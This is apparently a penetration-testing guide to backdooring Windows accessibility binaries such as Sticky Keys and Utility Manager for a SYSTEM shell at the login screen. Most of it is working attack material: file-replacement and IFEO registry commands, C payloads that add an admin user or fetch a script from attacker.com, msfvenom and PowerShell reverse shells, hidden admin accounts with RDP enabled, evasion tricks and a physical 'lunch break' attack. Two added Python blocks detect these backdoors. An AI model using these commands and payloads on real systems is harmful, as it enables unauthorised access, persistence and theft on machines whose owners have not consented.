This guide is currently under development, and I greatly welcome any suggestions or feedback or at reaper.gitbook@gmail.com

Misusing accessibility features

Understanding the Attack Vector

Why Accessibility Features Are Exploitable

Windows accessibility features create a unique attack surface because they:

  • Run with SYSTEM privileges by design

  • Execute before user authentication (available at login screen)

  • Are trusted system executables that bypass normal restrictions

  • Can be triggered through simple keyboard shortcuts

The Core Exploit: Replace legitimate accessibility executables with command prompts or custom payloads, giving SYSTEM-level access from the login screen without authentication.

Target Accessibility Features

Primary Targets

Sticky Keys (sethc.exe)

  • Trigger: Press Shift 5 times rapidly

  • Location: C:\Windows\System32\sethc.exe

  • Access Level: SYSTEM

  • Best For: Most reliable, works on all Windows versions

Utility Manager (utilman.exe)

  • Trigger: Windows Key + U

  • Location: C:\Windows\System32\utilman.exe

  • Access Level: SYSTEM

  • Best For: Quick access, harder to accidentally trigger

On-Screen Keyboard (osk.exe)

  • Trigger: Via Utility Manager or accessibility settings

  • Location: C:\Windows\System32\osk.exe

  • Access Level: SYSTEM

  • Best For: Less suspicious than cmd.exe replacement

Magnifier (magnify.exe)

  • Trigger: Windows Key + Plus

  • Location: C:\Windows\System32\magnify.exe

  • Access Level: SYSTEM

  • Best For: Alternative when others are monitored

Basic Exploitation Methods

Method 1: Direct File Replacement

The simplest and most effective approach: replace the accessibility executable with cmd.exe.

Sticky Keys Replacement:

# Take ownership and permissions
takeown /f C:\Windows\System32\sethc.exe /a
icacls C:\Windows\System32\sethc.exe /grant administrators:F

# Backup original
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.bak

# Replace with command prompt
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

Utility Manager Replacement:

takeown /f C:\Windows\System32\utilman.exe /a
icacls C:\Windows\System32\utilman.exe /grant administrators:F
copy C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.exe.bak
copy C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

Triggering the Backdoor:

  • Reboot or lock the computer

  • At login screen, press Shift 5 times (for sethc) or Windows+U (for utilman)

  • Command prompt opens with SYSTEM privileges
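From the defensive side, every replacement method on this page leaves the same on-disk evidence: an accessibility binary whose content is byte-for-byte cmd.exe (or identical to another replaced feature), a non-PE file sitting where an executable should be, or a stray .bak/.original copy next to the target. The following Python audit is an added example, not code from this page or any project it references; it runs against any directory laid out like System32 (a live host or a volume mounted from rescue media), and the demo tree it builds is constructed sample data, not real Windows binaries.

```python
from __future__ import annotations

import hashlib
import tempfile
from pathlib import Path

# Accessibility binaries named on this page; all live under System32.
ACCESSIBILITY_BINARIES = ("sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe")
# Backup names the replacement procedures on this page leave next to the target.
LEFTOVER_SUFFIXES = (".bak", ".original")


def sha256_of(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large binaries do not load into memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def audit_system32(system32: Path) -> list[str]:
    """Return human-readable findings for the accessibility binaries under `system32`.

    Indicators checked per binary:
      * content identical to cmd.exe          (direct replacement)
      * content identical to another target   (mass replacement of several features)
      * file does not start with the PE magic (a script copied over the executable)
      * a .bak / .original copy lying beside it
    """
    findings: list[str] = []
    cmd_path = system32 / "cmd.exe"
    cmd_hash = sha256_of(cmd_path) if cmd_path.is_file() else None
    seen: dict[str, str] = {}  # hash -> first accessibility binary seen with it

    for name in ACCESSIBILITY_BINARIES:
        path = system32 / name
        if not path.is_file():
            continue
        digest = sha256_of(path)
        if cmd_hash is not None and digest == cmd_hash:
            findings.append(f"{name}: content identical to cmd.exe (replaced)")
        if digest in seen:
            findings.append(f"{name}: content identical to {seen[digest]} (mass replacement)")
        else:
            seen[digest] = name
        with path.open("rb") as handle:
            if handle.read(2) != b"MZ":
                findings.append(f"{name}: not a PE image (script or wrapper copied over the exe)")
        for suffix in LEFTOVER_SUFFIXES:
            if (system32 / (name + suffix)).exists():
                findings.append(f"{name}: leftover backup {name}{suffix} present")
    return findings


def build_demo_volume(root: Path) -> Path:
    """Constructed sample tree standing in for a mounted Windows volume (not real binaries)."""
    system32 = root / "Windows" / "System32"
    system32.mkdir(parents=True)
    fake_cmd = b"MZ" + b"\x90" * 64 + b"constructed-cmd.exe-stand-in"
    (system32 / "cmd.exe").write_bytes(fake_cmd)
    (system32 / "sethc.exe").write_bytes(fake_cmd)                             # direct replacement
    (system32 / "sethc.exe.bak").write_bytes(b"MZ" + b"constructed-sethc")     # backup left behind
    (system32 / "utilman.exe").write_bytes(b"@echo off\r\nstart cmd.exe\r\n")  # batch copied over exe
    (system32 / "osk.exe").write_bytes(b"MZ" + b"constructed-osk")             # untouched
    return system32


def run_demo() -> list[str]:
    """Build the constructed volume in a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_system32(build_demo_volume(Path(tmp)))


if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

On a real host, point `audit_system32` at `C:\Windows\System32`; the hash checks are cheap to schedule and complement `sfc /verifyonly`, which compares the files against Microsoft's catalog rather than against each other.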

Method 2: Registry Image File Execution Options

Uses Windows debugging infrastructure to redirect execution without modifying files.

Setup Registry Redirection:

# Redirect sethc.exe to cmd.exe via registry
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

# Redirect utilman.exe
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe" /f

Advantages of Registry Method:

  • Original files remain intact

  • Harder to detect casually

  • Survives system file integrity checks

  • Can be applied to multiple targets simultaneously

Method 3: Custom Payload Deployment

Replace accessibility features with custom executables for specific functionality.

Simple User Creation Payload:

// user_creator.c
#include <windows.h>
#include <stdlib.h>   // system()
int main(void) {
    system("net user hacker Password123! /add");
    system("net localgroup administrators hacker /add");
    return 0;
}

Compile and Deploy:

gcc -o user_creator.exe user_creator.c
takeown /f C:\Windows\System32\sethc.exe /a
icacls C:\Windows\System32\sethc.exe /grant administrators:F
copy user_creator.exe C:\Windows\System32\sethc.exe

Reverse Shell Payload:

// reverse_shell.c
#include <windows.h>
#include <stdlib.h>   // system()
int main(void) {
    system("powershell -c \"IEX(New-Object Net.WebClient).downloadString('http://attacker.com/shell.ps1')\"");
    return 0;
}

Physical Access Exploitation

Bootable Media Method

When you have physical access but no credentials:

Windows PE Approach:

# Boot from Windows PE USB/CD
# Target drive typically appears as D: in PE environment

# Replace accessibility features
copy D:\Windows\System32\sethc.exe D:\Windows\System32\sethc.exe.bak
copy D:\Windows\System32\cmd.exe D:\Windows\System32\sethc.exe

# Reboot to normal Windows - backdoor is active

Linux Live USB Method:

# Boot from Linux live USB
mkdir /mnt/windows
mount /dev/sda1 /mnt/windows

# Perform replacement
cp /mnt/windows/Windows/System32/sethc.exe /mnt/windows/Windows/System32/sethc.exe.bak
cp /mnt/windows/Windows/System32/cmd.exe /mnt/windows/Windows/System32/sethc.exe

umount /mnt/windows
# Reboot to Windows

Safe Mode Exploitation

In Safe Mode with Command Prompt, you often get elevated access by default:

# Boot to Safe Mode with Command Prompt
# Perform replacements from elevated context
takeown /f C:\Windows\System32\sethc.exe
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

# Changes persist when booting to normal mode

Advanced Exploitation Techniques

Multiple Target Deployment

Hit several accessibility features simultaneously for redundancy:

REM Replace multiple targets (interactive cmd syntax; use %%i inside a batch file)
for %i in (sethc.exe utilman.exe osk.exe magnify.exe) do (
    takeown /f "C:\Windows\System32\%i" /a
    icacls "C:\Windows\System32\%i" /grant administrators:F
    copy "C:\Windows\System32\%i" "C:\Windows\System32\%i.bak"
    copy "C:\Windows\System32\cmd.exe" "C:\Windows\System32\%i"
)

Stealth Wrapper Approach

Maintain original functionality while adding backdoor capability:

@echo off
REM stealth_sethc.bat
if "%1"=="backdoor" (
    start cmd.exe
) else (
    start C:\Windows\System32\sethc.exe.original
)

Deploy the wrapper:

copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc.exe.original
copy stealth_sethc.bat C:\Windows\System32\sethc.exe

Usage:

  • Normal Shift x5 = original sticky keys

  • Shift x5 with "backdoor" parameter = command prompt

Registry-Based Conditional Access

Create conditional execution based on specific triggers:

# Create conditional batch file
echo @echo off > C:\Windows\System32\conditional.bat
echo if "%%COMPUTERNAME%%"=="TARGET-PC" start cmd.exe >> C:\Windows\System32\conditional.bat
echo if "%%USERNAME%%"=="admin" start cmd.exe >> C:\Windows\System32\conditional.bat

# Set registry redirection
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\conditional.bat" /f

Specific Attack Scenarios

Kiosk Environment Breakout

Public Computer Exploitation:

  1. Try accessibility shortcuts at login screen

  2. If Utility Manager opens, look for Settings or Help buttons

  3. Help systems often open browsers with file:// access

  4. Use "Run as administrator" options when available

Common Kiosk Breakout Paths:

  • Utility Manager → Settings → Browse for files

  • On-Screen Keyboard → Right-click → Properties → Browse

  • Narrator → Voice settings → Browse for voice files

  • Magnifier → Settings → Help → File browser

Corporate Workstation Access

Lunch Break Attack:

  1. Physical access to unlocked or logged-out workstation

  2. Boot from USB with Windows PE

  3. Replace accessibility feature

  4. Return later and use accessibility shortcut for SYSTEM access

Persistence Setup from SYSTEM Access:

# Create hidden admin account
net user "IT Support" "ComplexPass123!" /add
net localgroup administrators "IT Support" /add

# Hide account from login screen
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "IT Support" /t REG_DWORD /d 0 /f

# Enable RDP for remote access
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Shared Computer Lab

University/Library Scenario:

  1. Accessibility features may work even on restricted accounts

  2. Use SYSTEM access to enumerate other users

  3. Check for stored credentials or interesting data

  4. Install persistence for later access

Quick Enumeration Commands:

# From accessibility SYSTEM prompt
whoami /all
net user
dir C:\Users
wmic logicaldisk get size,freespace,caption

Payload Delivery Methods

MSFVenom Integration

Generate Custom Payloads:

# Reverse shell payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o accessibility_shell.exe

# Bind shell payload  
msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -f exe -o accessibility_bind.exe

# User creation payload
msfvenom -p windows/exec CMD="net user hacker Password123! /add && net localgroup administrators hacker /add" -f exe -o user_add.exe

Deploy Payload:

takeown /f C:\Windows\System32\sethc.exe /a
icacls C:\Windows\System32\sethc.exe /grant administrators:F
copy accessibility_shell.exe C:\Windows\System32\sethc.exe

PowerShell Payload Integration

PowerShell Reverse Shell:

# reverse_shell.ps1
$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100',4444)
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $sendback = (iex $data 2>&1 | Out-String)
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
    $stream.Write($sendbyte,0,$sendbyte.Length)
    $stream.Flush()
}
$client.Close()

Wrapper for PowerShell Execution:

@echo off
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\reverse_shell.ps1
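Whichever payload ends up behind the shortcut (cmd.exe, the compiled user-creation or reverse-shell programs above, an msfvenom binary, or this PowerShell wrapper), the process telemetry at trigger time is distinctive: a shell whose parent is winlogon.exe, a process whose image path is sethc.exe but whose version resource says Cmd.Exe, a cmd.exe started with an accessibility binary's path as its argument (the IFEO Debugger pattern), or a shell spawned by the accessibility binary itself. The detector below is an added example, not from this page or any product; it uses the field names of Sysmon Event ID 1 (Image, ParentImage, CommandLine, OriginalFileName), and the sample events are constructed, not captured from a real host.

```python
from __future__ import annotations

import ntpath

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
ACCESSIBILITY = {"sethc.exe", "utilman.exe", "osk.exe", "magnify.exe", "narrator.exe"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def classify(event: dict) -> list[str]:
    """Return the reasons one Sysmon Event ID 1 record looks like an accessibility backdoor."""
    image = _base(event.get("Image", ""))
    parent = _base(event.get("ParentImage", ""))
    original = event.get("OriginalFileName", "").lower()
    cmdline = event.get("CommandLine", "").lower()
    reasons: list[str] = []

    # A shell whose parent is winlogon.exe: only the logon screen runs there.
    if image in SHELLS and parent == "winlogon.exe":
        reasons.append("shell spawned by winlogon.exe (pre-logon SYSTEM shell)")
    # The file on disk is called sethc.exe but its version resource says otherwise.
    if image in ACCESSIBILITY and original and original != image:
        reasons.append(f"{image} reports OriginalFileName '{original}' (binary replaced)")
    # IFEO Debugger hands the original image path to the debugger as an argument.
    if image in SHELLS and any("\\" + name in cmdline for name in ACCESSIBILITY):
        reasons.append("shell received an accessibility binary path as argument (IFEO redirection)")
    # A wrapper or payload installed as the feature launching a shell itself.
    if image in SHELLS and parent in ACCESSIBILITY:
        reasons.append(f"shell spawned by {parent} (wrapper or payload in place of the feature)")
    return reasons


def detect(events: list[dict]) -> list[tuple[int, list[str]]]:
    """Index and reasons for every event that triggers at least one rule."""
    hits = []
    for index, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((index, reasons))
    return hits


# Constructed sample events in Sysmon Event ID 1 field names (not captured from a real host).
SAMPLE_EVENTS = [
    {   # direct file replacement: sethc.exe on disk is really cmd.exe
        "Image": r"C:\Windows\System32\sethc.exe", "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\System32\winlogon.exe", "CommandLine": "sethc.exe",
        "User": r"NT AUTHORITY\SYSTEM"},
    {   # IFEO redirection: cmd.exe started as the 'debugger' of utilman.exe
        "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\System32\winlogon.exe",
        "CommandLine": r"C:\windows\system32\cmd.exe C:\Windows\System32\utilman.exe",
        "User": r"NT AUTHORITY\SYSTEM"},
    {   # benign: the real Utility Manager at the logon screen
        "Image": r"C:\Windows\System32\utilman.exe", "OriginalFileName": "utilman.exe",
        "ParentImage": r"C:\Windows\System32\winlogon.exe", "CommandLine": "utilman.exe",
        "User": r"NT AUTHORITY\SYSTEM"},
    {   # benign: a user opening a prompt from the desktop
        "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
        "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe",
        "User": r"WORKSTATION\alice"},
    {   # wrapper in place of sethc.exe launching a hidden PowerShell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "ParentImage": r"C:\Windows\System32\sethc.exe",
        "CommandLine": r"powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File C:\Windows\Temp\reverse_shell.ps1",
        "User": r"NT AUTHORITY\SYSTEM"},
]


if __name__ == "__main__":
    for index, reasons in detect(SAMPLE_EVENTS):
        print(f"event {index}: " + "; ".join(reasons))
```

The two benign records show why the rules key on the parent/child pair and on OriginalFileName rather than on the user alone: utilman.exe under winlogon.exe as SYSTEM is exactly what a healthy logon screen looks like, so "SYSTEM process from winlogon" by itself would be noise.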

Evasion Techniques

Timestamp Preservation

Maintain original file timestamps to avoid detection:

# Get original timestamps before replacement
forfiles /m sethc.exe /c "cmd /c echo @fdate @ftime" > original_time.txt

# Perform replacement
copy C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe

# Restore original timestamps (requires additional tools)
# Use touch.exe or PowerShell to restore timestamps

Alternative Locations

Use less monitored accessibility features:

# Target narrator.exe (less commonly monitored)
takeown /f C:\Windows\System32\narrator.exe /a
copy C:\Windows\System32\narrator.exe C:\Windows\System32\narrator.exe.bak
copy C:\Windows\System32\cmd.exe C:\Windows\System32\narrator.exe

# Trigger with Windows+Ctrl+Enter

Registry Hiding

Use subtle registry modifications:

# Use registry key with slight misspelling or extra space
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe " /v Debugger /t REG_SZ /d "cmd.exe" /f

# Note the space after sethc.exe - harder to spot in tools

Cleanup and Restoration

Quick Restoration

Restore from Backups:

copy C:\Windows\System32\sethc.exe.bak C:\Windows\System32\sethc.exe
copy C:\Windows\System32\utilman.exe.bak C:\Windows\System32\utilman.exe

# Remove registry redirections
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /f
reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /f

System File Checker Restoration

Use Windows SFC:

# Restore specific files
sfc /scanfile=C:\Windows\System32\sethc.exe
sfc /scanfile=C:\Windows\System32\utilman.exe

# Full system scan
sfc /scannow

Key Operational Notes

Requirements

  • Administrator privileges for file replacement method

  • Physical access for login screen exploitation

  • Target must have accessibility features enabled (default on most Windows)

Success Indicators

  • Accessibility shortcut opens command prompt instead of normal feature

  • Command prompt runs as SYSTEM (verify with whoami)

  • Multiple accessibility features compromised for redundancy

Common Failure Points

  • Insufficient permissions for file modification

  • Antivirus blocking system file changes

  • Windows File Protection restoring files

  • User Account Control preventing elevation

Best Targets

  • Sticky Keys (sethc.exe) - Most reliable, universal trigger

  • Utility Manager (utilman.exe) - Quick access, less accidental activation

  • Multiple features - Redundancy in case one is restored or blocked

This technique remains one of the most effective methods for gaining SYSTEM-level access from Windows login screens, particularly valuable in physical access scenarios and environments where other exploitation methods are restricted.
